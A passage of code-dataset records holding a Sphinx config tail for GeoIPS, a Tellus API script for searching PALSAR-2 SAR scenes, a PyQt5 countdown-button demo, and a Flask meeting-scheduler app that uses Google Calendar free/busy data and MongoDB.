names.\n# html_sidebars = {}\n\n# Additional templates that should be rendered to pages, maps page names to\n# template names.\n# html_additional_pages = {}\n\n# If false, no module index is generated.\n# html_domain_indices = True\n\n# If false, no index is generated.\n# html_use_index = True\n\n# If true, the index is split into individual pages for each letter.\n# html_split_index = False\n\n# If true, links to the reST sources are added to the pages.\n# html_show_sourcelink = True\n\n# If true, \"Created using Sphinx\" is shown in the HTML footer. Default is True.\nhtml_show_sphinx = False\n\n# If true, \"(C) Copyright ...\" is shown in the HTML footer. Default is True.\n# US Navy does not copyright\nhtml_show_copyright = False\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n# html_use_opensearch = ''\n\n# This is the file name suffix for HTML files (e.g. \".xhtml\").\n# html_file_suffix = None\n\n# Language to be used for generating the HTML full-text search index.\n# Sphinx supports the following languages:\n# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'\n# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'\nhtml_search_language = \"en\"\n\n# A dictionary with options for the search language support, empty by default.\n# Now only 'ja' uses this config value\n# html_search_options = {'type': 'default'}\n\n# The name of a javascript file (relative to the configuration directory) that\n# implements a search results scorer. If empty, the default will be used.\n# html_search_scorer = 'scorer.js'\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = \"GeoIPS_PKGNAME_doc\"\n\n# -- Options for LaTeX output ---------------------------------------------\n\n# Latex additional files to include to format header footer for PDF.\nlatex_additional_files = [\"fancyhf.sty\"]\n\nlatex_elements = {\n # The paper size ('letterpaper' or 'a4paper').\n # 'papersize': 'letterpaper',\n # The font size ('10pt', '11pt' or '12pt').\n \"pointsize\": \"12pt\",\n # Additional stuff for the LaTeX preamble.\n # 'preamble': '',\n \"preamble\": r\"\\usepackage{fancyhf}\",\n # Latex figure (float) alignment\n \"figure_align\": \"H\",\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title,\n# author, documentclass [howto, manual, or own class]).\npkgnamelatex = \"PKGNAME\".split(\"_\")\nif len(pkgnamelatex) > 1:\n # set up latex escape\n pkgnamelatex = r\"\\_\".join(pkgnamelatex)\nlatex_documents = [\n (\n master_doc,\n \"GeoIPS_PKGNAME.tex\",\n \"GeoIPS {0} Documentation\".format(pkgnamelatex),\n \"U.S. NAVAL RESEARCH LABORATORY\",\n \"manual\",\n False,\n ),\n]\n\n# The name of an image file (relative to this directory) to place at the top of\n# the title page.\nlatex_logo = \"_static/NRL_logo_RGB.jpg\"\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n# latex_use_parts = False\n\n# If true, show page references after internal links.\n# latex_show_pagerefs = False\n\n# If true, show URL addresses after external links.\n# latex_show_urls = False\n\n# Documents to append as an appendix to all manuals.\n# latex_appendices = []\n\n# If false, no module index is generated.\nlatex_domain_indices = True\n\n\n# -- Options for manual page output ---------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n (master_doc, \"GeoIPS_PKGNAME\", \"GeoIPS PKGNAME Documentation\", [author], 1)\n]\n\n# If true, show URL addresses after external links.\n# man_show_urls = False\n\n\n# -- Options for Texinfo output -------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [\n (\n master_doc,\n \"GeoIPS_PKGNAME\",\n \"GeoIPS PKGNAME Documentation\",\n author,\n \"NRL-MMD\",\n \"Geolocated Information Processing System.\",\n \"packages: interface, modules, tools\",\n ),\n]\n\n# Documents to append as an appendix to all manuals.\n# texinfo_appendices = []\n\n# If false, no module index is generated.\ntexinfo_domain_indices = True\n\n# How to display URL addresses: 'footnote', 'no', or 'inline'.\n# texinfo_show_urls = 'footnote'\n\n# If true, do not generate a @detailmenu in the \"Top\" node's menu.\n# texinfo_no_detailmenu = False\n\n\n# setup and rstjinja based on pandas-doc rendering\ndef rstjinja(app, docname, source):\n \"\"\"Render our pages as a jinja template for fancy templating goodness.\"\"\"\n # https://www.ericholscher.com/blog/2016/jul/25/integrating-jinja-rst-sphinx/\n # Make sure we're outputting HTML\n if app.builder.format != \"html\":\n return\n src = source[0]\n rendered = app.builder.templates.render_string(src, app.config.html_context)\n source[0] = rendered\n\n\n# need min:max width limits ref https://stackoverflow.com/a/43186995/1480918\ndef setup(app):\n \"\"\"Css width setup.\"\"\"\n app.add_css_file(\"set_width.css\")\n \"\"\"Jinja setup function.\"\"\"\n app.connect(\"source-read\", rstjinja)\n", "repo_name": "NRLMMD-GEOIPS/geoips", "sub_path": "docs/source/_templates/conf_PKG.py", "file_name": "conf_PKG.py", "file_ext": "py", "file_size_in_byte": 11980, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "52", "api": [{"api_name": "geoips.__version__", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "sys.path.extend", "line_number": 28, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "jinja2.Template", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}]} +{"seq_id": "2337498311", "text": "import requests, json\nimport argparse\n\ndef parse_args():\n \"\"\"Parse command line arguments.\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"TOKEN\", type=str, help=\"your Tellus API TOKEN\")\n parser.add_argument(\"-p\", \"--Palsar_Type\", type=str, default=\"L2.1\", help=\"Specify L2.1 or L1.1\")\n parser.add_argument(\"-s\", \"--start_datetime\", type=str, default=\"2017-04-21\", help=\"search start datetime\")\n parser.add_argument(\"-e\", \"--end_datetime\", type=str, default=\"2021-12-30\", help=\"search end datetime\")\n parser.add_argument(\"-lat\", \"--lat\", type=float, default=139.692101, help=\"search center latitude\")\n parser.add_argument(\"-lon\", \"--lon\", type=float, default=35.689634, help=\"search center longitude\") \n args = parser.parse_args()\n\n return args\n\n\ndef make_config(args):\n config = {}\n config['TOKEN'] = args.TOKEN\n\n if args.Palsar_Type == \"L2.1\":\n # Palsar-2, L2.1\n config['datasetId'] = 'b0e16dea-6544-4422-926f-ad3ec9a3fcbd'\n elif args.Palsar_Type == \"L1.1\":\n # Palsar-2, L1.1\n config['datasetId'] = '1a41a4b1-4594-431f-95fb-82f9bdc35d6b'\n else:\n # Palsar-2, L2.1\n config['datasetId'] = 'b0e16dea-6544-4422-926f-ad3ec9a3fcbd'\n print(\"Specify L2.1 or L1.1, for now using L2.1\")\n \n config['query']={\n 'start_datetime': {'gte': args.start_datetime},\n 'end_datetime': {'lte': args.end_datetime}\n }\n config['sortby'] = [\n {'field': 'properties.end_datetime', 'direction':'desc'}\n ]\n \n config['intersects'] = make_inter(args.lat, args.lon)\n config['lat'] = args.lat\n config['lon'] = args.lon\n\n return config\n\n\ndef make_inter(lat, lon):\n lat_plus = lat + 0.01\n lon_plus = lon + 0.01\n\n intersects = {\n 'type': 'Polygon', 'coordinates': [\n [\n [lat, lon],\n [lat_plus, lon],\n [lat_plus, lon_plus],\n [lat, lon_plus],\n [lat, lon]\n ]\n ]\n }\n return intersects\n\n\ndef search_palsar2_l11(config, paginate=None, next_url=''):\n if len(next_url) > 0:\n url = next_url\n else:\n url = 'https://www.tellusxdp.com/api/traveler/v1/datasets/{}/data-search/'.format(config['dataset_id'])\n headers = {\n \"Authorization\": \"Bearer \" + config['TOKEN'],\n 'Content-Type': 'application/json'\n }\n\n payloads = {}\n if config['intersects'] is not None:\n payloads['intersects'] = config['intersects']\n if config['query'] is not None:\n payloads['query'] = config['query']\n if isinstance(config['sortby'], list):\n payloads['sortby'] = config['sortby']\n if paginate is not None:\n payloads['paginate'] = paginate\n r = requests.post(url, headers=headers, data=json.dumps(payloads))\n\n if not r.status_code == requests.codes.ok:\n r.raise_for_status()\n return r.json()\n\n\ndef main():\n args = parse_args()\n config = make_config(args)\n lat = config['lat']\n lon = config['lon']\n \n ret = search_palsar2_l11(config)\n\n for i in ret['features']:\n geo = i['geometry']['coordinates']\n pro = i['properties']\n lon_min = min([geo[0][i][0] for i in range(4)])\n lat_min = min([geo[0][i][1] for i in range(4)])\n lon_max = max([geo[0][i][0] for i in range(4)])\n lat_max = max([geo[0][i][1] for i in range(4)])\n if lat > lat_min and lat < lat_max and lon > lon_min and lon < lon_max:\n print(i['id'], pro['palsar2:beam'], pro['sat:relative_orbit'], pro['tellus:sat_frame'], pro['start_datetime'])\n \n\nif __name__ == \"__main__\":\n main()", "repo_name": "yosuke-civil-tokyo/SAR_disaster_Tellus", "sub_path": "search_sar.py", "file_name": "search_sar.py", "file_ext": "py", "file_size_in_byte": 3658, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 86, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 86, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 88, "usage_type": "attribute"}]} +{"seq_id": "24157113200", "text": "import sys\nfrom PyQt5.QtWidgets import QToolButton, QWidget, QPushButton, QApplication, QMainWindow, QAction, qApp, QMenu\n\nfrom PyQt5.QtCore import QTimer, QUrl\nfrom PyQt5.QtCore import Qt\n\nclass Example(QWidget):\n def initUI(self):\n\n bt1 = QPushButton(\"这是什么\",self)\n\n self.bt2 = QPushButton('发送验证码',self)\n\n menu = QMenu(self)\n menu.addAction('我是')\n menu.addSeparator()\n menu.addAction('世界上')\n menu.addSeparator()\n menu.addAction('最帅的')\n\n bt1.setMenu(menu)\n\n self.count = 10\n\n self.bt2.clicked.connect(self.Action)\n\n self.time = QTimer(self)\n self.time.setInterval(1000)\n self.time.timeout.connect(self.Refresh)\n\n self.show()\n\n def Action(self):\n if self.bt2.isEnabled():\n self.time.start()\n self.bt2.setEnabled(False)\n \n def Refresh(self):\n if self.count > 0:\n self.bt2.setText(str(self.count)+'秒后重发')\n self.count -= 1\n else:\n self.time.stop()\n self.bt2.setEnabled(True)\n self.bt2.setText('发送验证码')\n self.count = 10\n\nif __name__ == '__main__':\n\tapp = QApplication(sys.argv)\n\tex = Example()\n\tsys.exit(app.exec_())", "repo_name": "Falcon-Peregrine/PyQt5", "sub_path": "知乎Win7端/10_QPushButton(QPushButton, QTimer).py", "file_name": "10_QPushButton(QPushButton, QTimer).py", "file_ext": "py", "file_size_in_byte": 1289, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 7, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 10, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 12, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMenu", "line_number": 14, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 27, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "13828847353", "text": "import flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for\nimport uuid\n\nimport json\nimport logging\n\n# Date handling\nimport arrow # Replacement for datetime, based on moment.js\nimport datetime # But we still need time\nfrom dateutil import tz # For interpreting local times\n\n\n# OAuth2 - Google library implementation for convenience\nfrom oauth2client import client\nimport httplib2 # used in oauth2 flow\n\n# Google API for services\nfrom apiclient import discovery\n\n# Mongo database\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\n\n# random int for key\nfrom random import randint\n\n###\n# Globals\n###\nimport CONFIG\napp = flask.Flask(__name__)\n\n\ntry:\n dbclient = MongoClient(CONFIG.MONGO_URL)\n db = dbclient.MeetMe\n collection = db.dated\n\nexcept:\n print(\"Failure opening database. Is Mongo running? Correct password?\")\n sys.exit(1)\n\nSCOPES = 'https://www.googleapis.com/auth/calendar.readonly'\nCLIENT_SECRET_FILE = CONFIG.GOOGLE_LICENSE_KEY ## You'll need this\nAPPLICATION_NAME = 'MeetMe'\n\n\n#############################\n#\n# Pages (routed from URLs)\n#\n#############################\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n app.logger.debug(\"Entering index\")\n if 'begin_date' not in flask.session:\n init_session_values()\n if 'calendars' in flask.session:\n flask.session.pop('calendars', None)\n return render_template('index.html')\n\n@app.route(\"/choose\")\ndef choose():\n ## We'll need authorization to list calendars\n ## I wanted to put what follows into a function, but had\n ## to pull it back here because the redirect has to be a\n ## 'return'\n app.logger.debug(\"Checking credentials for Google calendar access\")\n credentials = valid_credentials()\n if not credentials:\n app.logger.debug(\"Redirecting to authorization\")\n return flask.redirect(flask.url_for('oauth2callback'))\n global gcal_service #used in busyTimes\n gcal_service = get_gcal_service(credentials)\n app.logger.debug(\"Returned from get_gcal_service\")\n flask.session['calendars'] = list_calendars(gcal_service)\n return render_template('index.html')\n\n####\n#\n# Google calendar authorization:\n# Returns us to the main /choose screen after inserting\n# the calendar_service object in the session state. May\n# redirect to OAuth server first, and may take multiple\n# trips through the oauth2 callback function.\n#\n# Protocol for use ON EACH REQUEST:\n# First, check for valid credentials\n# If we don't have valid credentials\n# Get credentials (jump to the oauth2 protocol)\n# (redirects back to /choose, this time with credentials)\n# If we do have valid credentials\n# Get the service object\n#\n# The final result of successful authorization is a 'service'\n# object. We use a 'service' object to actually retrieve data\n# from the Google services. Service objects are NOT serializable ---\n# we can't stash one in a cookie. Instead, on each request we\n# get a fresh serivce object from our credentials, which are\n# serializable.\n#\n# Note that after authorization we always redirect to /choose;\n# If this is unsatisfactory, we'll need a session variable to use\n# as a 'continuation' or 'return address' to use instead.\n#\n####\n\ndef valid_credentials():\n \"\"\"\n Returns OAuth2 credentials if we have valid\n credentials in the session. This is a 'truthy' value.\n Return None if we don't have credentials, or if they\n have expired or are otherwise invalid. This is a 'falsy' value.\n \"\"\"\n if 'credentials' not in flask.session:\n return None\n\n credentials = client.OAuth2Credentials.from_json(\n flask.session['credentials'])\n\n if (credentials.invalid or\n credentials.access_token_expired):\n return None\n return credentials\n\n\ndef get_gcal_service(credentials):\n \"\"\"\n We need a Google calendar 'service' object to obtain\n list of calendars, busy times, etc. This requires\n authorization. If authorization is already in effect,\n we'll just return with the authorization. Otherwise,\n control flow will be interrupted by authorization, and we'll\n end up redirected back to /choose *without a service object*.\n Then the second call will succeed without additional authorization.\n \"\"\"\n app.logger.debug(\"Entering get_gcal_service\")\n http_auth = credentials.authorize(httplib2.Http())\n service = discovery.build('calendar', 'v3', http=http_auth)\n app.logger.debug(\"Returning service\")\n return service\n\n@app.route('/oauth2callback')\ndef oauth2callback():\n \"\"\"\n The 'flow' has this one place to call back to. We'll enter here\n more than once as steps in the flow are completed, and need to keep\n track of how far we've gotten. The first time we'll do the first\n step, the second time we'll skip the first step and do the second,\n and so on.\n \"\"\"\n app.logger.debug(\"Entering oauth2callback\")\n flow = client.flow_from_clientsecrets(\n CLIENT_SECRET_FILE,\n scope= SCOPES,\n redirect_uri=flask.url_for('oauth2callback', _external=True))\n ## Note we are *not* redirecting above. We are noting *where*\n ## we will redirect to, which is this function.\n\n ## The *second* time we enter here, it's a callback\n ## with 'code' set in the URL parameter. If we don't\n ## see that, it must be the first time through, so we\n ## need to do step 1.\n app.logger.debug(\"Got flow\")\n if 'code' not in flask.request.args:\n app.logger.debug(\"Code not in flask.request.args\")\n auth_uri = flow.step1_get_authorize_url()\n return flask.redirect(auth_uri)\n ## This will redirect back here, but the second time through\n ## we'll have the 'code' parameter set\n else:\n ## It's the second time through ... we can tell because\n ## we got the 'code' argument in the URL.\n app.logger.debug(\"Code was in flask.request.args\")\n auth_code = flask.request.args.get('code')\n credentials = flow.step2_exchange(auth_code)\n flask.session['credentials'] = credentials.to_json()\n ## Now I can build the service and execute the query,\n ## but for the moment I'll just log it and go back to\n ## the main screen\n app.logger.debug(\"Got credentials\")\n return flask.redirect(flask.url_for('choose'))\n\n#####\n#\n# Option setting: Buttons or forms that add some\n# information into session state. Don't do the\n# computation here; use of the information might\n# depend on what other information we have.\n# Setting an option sends us back to the main display\n# page, where we may put the new information to use.\n#\n#####\n\n#Add new members to the meet me app\n#Seems to need to be a different browser\n@app.route('/addMembers')\ndef addMember():\n key = request.args.get('key')\n flask.session['finalMeetingID'] = key\n return flask.redirect(flask.url_for(\"index\"))\n\n\n@app.route('/finalizeMeeting', methods=['POST'])\ndef finalizeMeeting():\n key = request.form.get('finalMeetingID')\n\n #checks to see if key can be turned into int\n try:\n int(key)\n except:\n flask.flash(\"Invalid Key\")\n return flask.redirect(flask.url_for(\"index\"))\n\n #if key is a number check valid number\n if (99999 < int(key) < 1000000):\n \"\"\"valid key\"\"\"\n else:\n flask.flash(\"Invalid Key\")\n return flask.redirect(flask.url_for(\"index\"))\n\n #checks to see if id is even in database\n try:\n validate_key_count = 0\n for record in collection.find({\"type\":\"date_range\"}):\n if (record[\"id\"] == key):\n validate_key_count+=1\n else:\n \"not a match\"\n if validate_key_count == 0:\n flask.flash(\"No matching keys in database\")\n return flask.redirect(flask.url_for(\"index\"))\n else:\n \"\"\"there are matches in the collection\"\"\"\n except:\n flask.flash(\"No matching keys in database\")\n return flask.redirect(flask.url_for(\"index\"))\n\n start_end_tuple = mergeDateRanges(key)\n\n if (start_end_tuple == -1):\n flask.flash(\"No overlapping dates in date ranges between users\")\n collection.remove({ 'id':key })\n return flask.redirect(flask.url_for(\"index\"))\n\n start_date = start_end_tuple['start_date']\n end_date = start_end_tuple['end_date']\n\n all_events_list = getEvents(key)\n\n flask.session['final_proposal'] = 'true'\n\n free_times = freeTimes(all_events_list, start_date, end_date)\n displayFreeTimes(free_times)\n\n return flask.redirect(flask.url_for(\"index\"))\n\n@app.route('/deleteproposal', methods=['POST'])\ndef deleteproposal():\n #clears database of that proposal\n flask.session.pop('final_proposal', None)\n collection.remove({ 'id':flask.session['meetingID'] })\n return flask.redirect(flask.url_for(\"index\"))\n\n@app.route('/goback', methods=['POST'])\ndef goback():\n #goes back without clearing that database\n flask.session.pop('final_proposal', None)\n return flask.redirect(flask.url_for(\"index\"))\n\n@app.route('/setrange', methods=['POST'])\ndef setrange():\n\n \"\"\"\n User chose a date range with the bootstrap daterange\n widget.\n \"\"\"\n\n\n app.logger.debug(\"Entering setrange\")\n flask.flash(\"Setrange gave us '{}'\"\n .format(request.form.get('daterange')))\n daterange = request.form.get('daterange')\n flask.session['daterange'] = daterange\n daterange_parts = daterange.split()\n flask.session['begin_date'] = interpret_date(daterange_parts[0])\n flask.session['end_date'] = interpret_date(daterange_parts[2])\n key = str(randint(100000,999999))\n flask.session['meetingID'] = key\n try:\n key = flask.session['finalMeetingID']\n flask.session['meetingID'] = key\n except:\n \"\"\"no final meeting id yet\"\"\"\n record = {\"type\": \"date_range\",\n \"id\": key,\n \"start_date\": flask.session['begin_date'],\n \"end_date\": flask.session['end_date']\n }\n collection.insert(record)\n app.logger.debug(\"Setrange parsed {} - {} dates as {} - {}\".format(\n daterange_parts[0], daterange_parts[1],\n flask.session['begin_date'], flask.session['end_date']))\n return flask.redirect(flask.url_for(\"choose\"))\n\n@app.route('/select_calendars', methods=['POST'])\ndef getCalendars():\n app.logger.debug(\"Get selected caldendars\")\n selected_calendars = request.form.getlist('calendar')\n meetingID = str(flask.session['meetingID'])\n try:\n flask.session['finalMeetingID']\n flask.flash(\"Thanks for submitting. Please wait for proposer to get back to you!\")\n except:\n flask.flash(\"This is the key to finalize below.\")\n flask.flash(meetingID)\n flask.flash(\"Below is the url to provide to other meeting participants.\")\n message = \"ix.cs.uoregon.edu:6996/addMembers?key=\" + meetingID\n flask.flash(message)\n\n full_calendars = []\n for cal in flask.session['calendars']:\n if cal['id'] in selected_calendars:\n full_calendars.append(cal)\n cal_event_list = calEventList(full_calendars)\n #put event times into one list\n for cal in cal_event_list:\n if cal: #In case list is empty\n for event in cal:\n #to local time below\n ev_start = arrow.get(event['start']).to('local')\n ev_end = arrow.get(event['end']).to('local')\n record = { \"type\":\"busy_times\",\n \"start\": ev_start.isoformat(),\n \"end\": ev_end.isoformat(),\n \"id\": flask.session['meetingID']\n }\n collection.insert(record)\n\n return flask.redirect(flask.url_for(\"index\"))\n\n####\n#\n# Initialize session variables\n#\n####\n\ndef init_session_values():\n \"\"\"\n Start with some reasonable defaults for date and time ranges.\n Note this must be run in app context ... can't call from main.\n \"\"\"\n # Default date span = tomorrow to 1 week from now\n now = arrow.now('local')\n tomorrow = now.replace(days=+1)\n nextweek = now.replace(days=+7)\n flask.session[\"begin_date\"] = tomorrow.floor('day').isoformat()\n flask.session[\"end_date\"] = nextweek.ceil('day').isoformat()\n flask.session[\"daterange\"] = \"{} - {}\".format(\n tomorrow.format(\"MM/DD/YYYY\"),\n nextweek.format(\"MM/DD/YYYY\"))\n # Default time span each day, 9 to 5\n flask.session[\"begin_time\"] = interpret_time(\"9am\")\n flask.session[\"end_time\"] = interpret_time(\"5pm\")\n\ndef interpret_time( text ):\n \"\"\"\n Read time in a human-compatible format and\n interpret as ISO format with local timezone.\n May throw exception if time can't be interpreted. In that\n case it will also flash a message explaining accepted formats.\n \"\"\"\n app.logger.debug(\"Decoding time '{}'\".format(text))\n time_formats = [\"ha\", \"h:mma\", \"h:mm a\", \"H:mm\"]\n try:\n as_arrow = arrow.get(text, time_formats).replace(tzinfo=tz.tzlocal())\n app.logger.debug(\"Succeeded interpreting time\")\n except:\n app.logger.debug(\"Failed to interpret time\")\n flask.flash(\"Time '{}' didn't match accepted formats 13:30 or 1:30pm\"\n .format(text))\n raise\n return as_arrow.isoformat()\n\ndef interpret_date( text ):\n \"\"\"\n Convert text of date to ISO format used internally,\n with the local time zone.\n \"\"\"\n try:\n as_arrow = arrow.get(text, \"MM/DD/YYYY\").replace(\n tzinfo=tz.tzlocal())\n except:\n flask.flash(\"Date '{}' didn't fit expected format 12/31/2001\")\n raise\n return as_arrow.isoformat()\n\ndef next_day(isotext):\n \"\"\"\n ISO date + 1 day (used in query to Google calendar)\n \"\"\"\n as_arrow = arrow.get(isotext)\n return as_arrow.replace(days=+1).isoformat()\n\n####\n#\n# Functions (NOT pages) that return some information\n#\n####\n\ndef getEvents(key):\n list = []\n for record in collection.find({\"type\": \"busy_times\"}):\n if (record['id'] == key):\n start = record['start']\n end = record['end']\n start = arrow.get(start)\n end = arrow.get(end)\n pair = {'start': start, 'end': end}\n list.append(pair)\n return list\n\ndef mergeDateRanges(key):\n starts = []\n ends = []\n for record in collection.find({\"type\":\"date_range\"}):\n if (record[\"id\"] == key):\n start = record[\"start_date\"]\n end = record[\"end_date\"]\n starts.append(start)\n ends.append(end)\n starts.sort()\n ends.sort()\n start = starts[-1]\n end = ends[0]\n end = arrow.get(end).isoformat()\n if start <= end:\n return {'start_date': start, 'end_date': end}\n else:\n return -1\n\ndef freeTimes(all_events_list, start_date, end_date):\n\n #add nights as events\n all_events_list = addNights(all_events_list, start_date, end_date)\n sorted_events = sortEvents(all_events_list) #sort events\n free_times = getFreeTimes(sorted_events) #gets list of free times\n return free_times\n\n\ndef displayFreeTimes(free_times):\n #into a readable format for flask.flash\n for times in free_times:\n message = []\n message.append(readableDate(times[0]))\n message.append(\" to \")\n message.append(readableDate(times[1]))\n message = ''.join(message)\n flask.flash(message)\n\n\ndef readableDate(date): #formats from arrow object to readable date\n return date.format('HH:mm MM/DD/YY')\n\ndef getFreeTimes(sorted_list):\n\n #gets rid of overlapping events\n improved_sorted_list = eliminateDuplicates(sorted_list)\n\n free_times = []\n#Adds times from end of events to beginning of next events to free times list\n for i in range(len(improved_sorted_list)-1):\n event = improved_sorted_list[i]\n next_event = improved_sorted_list[i+1]\n if (event['end'] < next_event['start']):\n #put in an ordered list to ensure the same order\n free_times.append([event['end'], next_event['start']])\n return free_times\n\n\n#gets rid of duplicate busy times\ndef eliminateDuplicates(list):\n new_list = []\n list_size = len(list)\n for i in range(list_size-1):\n event = list[i]\n next_event = list[i+1]\n#If the next events start time is before the previous events end time then\n#the previous events end time because the next events start time\n event['end'].replace\n if (event['end'] > next_event['start'] and event['end'] > next_event['end']):\n new_list.append({'start':event['start'], 'end':event['end']})\n list[i+1]['end'] = event['end'] #prevents problems with next iteration\n elif (event['end'] >= next_event['start']):\n new_list.append({'start':event['start'], 'end':next_event['start']})\n else:\n new_list.append({'start':event['start'], 'end':event['end']})\n #add last event to new_list\n new_list.append(list[list_size-1])\n return new_list\n\n\n#add nights as events so free time is from 9am-5pm(normal work day)\ndef addNights(list, sd, ed):\n start_date = arrow.get(sd)\n #end_date = arrow.get(ed).replace(hours=-24)\n end_date = arrow.get(ed)\n for day in arrow.Arrow.span_range('day', start_date, end_date): #goes through day range\n early_morning = {'start':day[0], 'end':day[0].replace(hours=+9)}\n late_nights = {'start':day[1].replace(hours=-7).replace(seconds=+.000001), 'end':day[1].replace(seconds=+.000001)}\n list.append(early_morning)\n list.append(late_nights)\n return list\n\n\n#returns sorted list of events based off start times\ndef sortEvents(list):\n start_times = []\n #puts all the starts in a list\n for ev in list: #ev is event\n start_times.append(ev['start'])\n #sorts start times\n start_times.sort()\n sorted_times = []\n #puts ordered start times with the respective end times\n for times in start_times:\n for ev in list:\n if (times == ev['start']):\n sorted_times.append({'start':ev['start'], 'end':ev['end']})\n return sorted_times\n\n\n#gets list of events based off selected calendars\ndef calEventList(cal_list):\n begin_date = flask.session['begin_date'] #gets user inputed start date\n end_date = flask.session['end_date'] #gets user inputed end date\n end_date = arrow.get(end_date).replace(hours=+24).isoformat() #add 24 hours to include whole day\n #flask.session['end_date'] = end_date\n busy_times = []\n for cal in cal_list:\n calID = cal['id']\n freebusy_query = {\n \"timeMin\" : begin_date,\n \"timeMax\" : end_date,\n \"items\" : [{ \"id\" : calID }]\n }\n result = gcal_service.freebusy().query(body=freebusy_query).execute()\n result_times = result['calendars'][calID]['busy']\n busy_times.append(result_times)\n return busy_times\n\n\ndef list_calendars(service):\n \"\"\"\n Given a google 'service' object, return a list of\n calendars. Each calendar is represented by a dict, so that\n it can be stored in the session object and converted to\n json for cookies. The returned list is sorted to have\n the primary calendar first, and selected (that is, displayed in\n Google Calendars web app) calendars before unselected calendars.\n \"\"\"\n app.logger.debug(\"Entering list_calendars\")\n calendar_list = service.calendarList().list().execute()[\"items\"]\n result = []\n for cal in calendar_list:\n kind = cal[\"kind\"]\n id = cal[\"id\"]\n if \"description\" in cal:\n desc = cal[\"description\"]\n else:\n desc = \"(no description)\"\n summary = cal[\"summary\"]\n # Optional binary attributes with False as default\n selected = (\"selected\" in cal) and cal[\"selected\"]\n primary = (\"primary\" in cal) and cal[\"primary\"]\n\n\n result.append(\n { \"kind\": kind,\n \"id\": id,\n \"summary\": summary,\n \"selected\": selected,\n \"primary\": primary\n })\n return sorted(result, key=cal_sort_key)\n\n\ndef cal_sort_key( cal ):\n \"\"\"\n Sort key for the list of calendars: primary calendar first,\n then other selected calendars, then unselected calendars.\n (\" \" sorts before \"X\", and tuples are compared piecewise)\n \"\"\"\n if cal[\"selected\"]:\n selected_key = \" \"\n else:\n selected_key = \"X\"\n if cal[\"primary\"]:\n primary_key = \" \"\n else:\n primary_key = \"X\"\n return (primary_key, selected_key, cal[\"summary\"])\n\n\n#################\n#\n# Functions used within the templates\n#\n#################\n\n@app.template_filter( 'fmtdate' )\ndef format_arrow_date( date ):\n try:\n normal = arrow.get( date )\n return normal.format(\"ddd MM/DD/YYYY\")\n except:\n return \"(bad date)\"\n\n@app.template_filter( 'fmttime' )\ndef format_arrow_time( time ):\n try:\n normal = arrow.get( time )\n return normal.format(\"HH:mm\")\n except:\n return \"(bad time)\"\n\n#############\n\n\nif __name__ == \"__main__\":\n # App is created above so that it will\n # exist whether this is 'main' or not\n # (e.g., if we are running in a CGI script)\n\n app.secret_key = str(uuid.uuid4())\n app.debug=CONFIG.DEBUG\n app.logger.setLevel(logging.DEBUG)\n # We run on localhost only if debugging,\n # otherwise accessible to world\n if CONFIG.DEBUG:\n # Reachable only from the same computer\n app.run(port=CONFIG.PORT)\n else:\n # Reachable from anywhere\n app.run(port=CONFIG.PORT,host=\"0.0.0.0\")\n\n", "repo_name": "rghusbands/Meet-Me-Web-App", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 21446, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 34, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 38, "usage_type": "call"}, {"api_name": "CONFIG.MONGO_URL", "line_number": 38, "usage_type": "attribute"}, {"api_name": "CONFIG.GOOGLE_LICENSE_KEY", "line_number": 47, "usage_type": 